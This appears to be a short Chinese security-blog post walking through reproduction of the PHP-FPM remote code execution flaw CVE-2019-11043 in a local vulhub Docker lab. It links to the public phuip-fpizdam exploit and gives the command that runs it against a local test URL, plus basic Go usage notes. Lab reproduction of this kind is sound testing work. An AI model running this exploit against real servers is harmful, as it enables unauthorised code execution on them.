微慑信息网

PHP远程代码执行CVE-2019-11043测试

相关资料:

https://github.com/neex/phuip-fpizdam

https://github.com/vulhub/vulhub/tree/master/php/CVE-2019-11043

PHP 远程代码执行漏洞 (CVE-2019-11043)[附exploit]

按照步骤测试:

1、git clone vulhub

2、CVE-2019-11043下执行

docker-compose up -d

3、访问本地IP:8080/index.php

4、phuip-fpizdam目录下执行

go run . "http://192.168.45.129:8080/index.php"

 

5、如描述中所说,该漏洞依赖php-fpm,php运行时,php-fpm有多个进程执行,如果执行不生效需要多刷新几次即可

 

相关:

查看版本:go version

查看golang环境变量:go env

编译: go install / go build  ,两者的区别可参考:https://www.jianshu.com/p/88e407232631

本文标题:PHP远程代码执行CVE-2019-11043测试
本文链接:
(转载请附上本文链接)
https://vulsee.com/archives/vulsee_2019/1025_9136.html
转载请附本站链接,未经允许不得转载,,谢谢:微慑信息网-VulSee.com » PHP远程代码执行CVE-2019-11043测试
分享到: 更多 (0)

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址

微慑信息网 专注工匠精神

访问我们联系我们